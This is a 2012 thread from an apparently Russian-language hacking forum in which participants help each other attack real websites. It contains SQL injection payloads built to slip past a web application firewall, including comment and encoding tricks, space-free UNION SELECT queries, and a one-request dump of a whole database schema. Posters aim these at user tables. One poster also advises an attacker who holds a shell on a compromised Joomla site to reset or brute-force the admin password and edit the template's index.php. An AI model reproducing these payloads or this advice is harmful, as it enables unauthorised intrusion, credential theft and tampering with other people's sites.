Старый 13.03.2012, 21:12   #1821
Guest
 
Регистрация: 13.03.2012
Сообщений: 9
Репутация: 1
По умолчанию

durito,
попробуй LIMIT (сначала 0,1, потом 1,1 и т.д.)

Я проверить не могу

=====================

У меня такой вопрос: WAF фильтрует слово users, поэтому не получается достать инфу о пользователях. Можно ли в mysql закодировать имя таблицы?
Guest вне форума   Ответить с цитированием
Старый 13.03.2012, 21:16   #1822
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

Guest, /*!%0dusErs*/
faza02 вне форума   Ответить с цитированием
Старый 13.03.2012, 21:20   #1823
Guest
 
Регистрация: 13.03.2012
Сообщений: 9
Репутация: 1
По умолчанию

Не, такие варианты не прокатывают =(

WAF реагирует на строку users в любом регистре

Единственный шанс - это закодировать имя таблицы в запросе который обработает база.
Guest вне форума   Ответить с цитированием
Старый 13.03.2012, 21:21   #1824
Paul Kaplan
 
Аватар для Paul Kaplan
 
Регистрация: 10.10.2011
Сообщений: 2
Репутация: 0
По умолчанию

У меня не сапа.
Если вкратце, то есть скрипт.php который вытаскивает текст с моего сервера и должен вывести его (текст) на странице форума или джумлы.
Доступа в админку нет, только шелл.
Инклудить в сам шаблон нельзя, так как там .tpl
Соответственно должен быть скрипт, который формирует страницу.
Его имя мне и нужно, дальше сам разберусь.
Paul Kaplan вне форума   Ответить с цитированием
Старый 13.03.2012, 21:25   #1825
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

Paul Kaplan, замени пасс админу, если лень брутить существующий, будет тебе доступ.
site/templates/[имя установленного темпелейта]/index.php
faza02 вне форума   Ответить с цитированием
Старый 13.03.2012, 21:34   #1826
xanxy
 
Регистрация: 06.11.2011
Сообщений: 5
Репутация: 1
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
как запрос составить полностью без пробелов? убрать около лимита его. на ачате мне сей секрет рассказывать не хотят.
union(select(1),2,3,GROUP_CONCAT(table_name),5,(6) from(information_schema.tables)WHERE(table_name)>= 0xXXX)

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit/**/1,1)

PS:
вот запрос чтоб всю структуру в один запрос вывести, без пробелов допилишь сам
SELECT @n FROM (select @n:=0x7c,(select null FROM (SELECT CONCAT_WS(0x2E,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME )w FROM information_schema.COLUMNS WHERE TABLE_SCHEMA NOT IN (0x6D7973716C, 0x696E666F726D6174696F6E5F736368656D61, 0x706572666F726D616E63655F736368656D61) ORDER BY w)y where @n:=concat(@n,0x0A,y.w) ))n
xanxy вне форума   Ответить с цитированием
Старый 13.03.2012, 21:38   #1827
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

Цитата:
Сообщение от Guest Посмотреть сообщение
durito,
попробуй LIMIT (сначала 0,1, потом 1,1 и т.д.)
это mssql, limit тут нет
durito вне форума   Ответить с цитированием
Старый 13.03.2012, 21:39   #1828
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

что ж вы мне пытаетесь /**/ всунуть
да, я знаю, еще можно %0a, %0d и так далее

Цитата:
union(select(1),2,3,GROUP_CONCAT(table_name),5,(6) from(information_schema.tables)WHERE(table_name)>= 0xXXX)
как выводить — спасибо, я еще до этого не дошел, мне бы пока разобраться с синтаксисом без пробелов в лимите
faza02 вне форума   Ответить с цитированием
Старый 13.03.2012, 22:37   #1829
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

faza02 Лимит без пробела - никак, если нужно по одной записи то придётся группировать через where и уникальный ключ, как то так : where(id=1)
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 13.03.2012, 22:40   #1830
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

Jokester, спасибо.
https://rdot.org/forum/showthread.php?t=1243
вот еще тема всплыла, если кому-то понадобится, вроде разобрался.
faza02 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot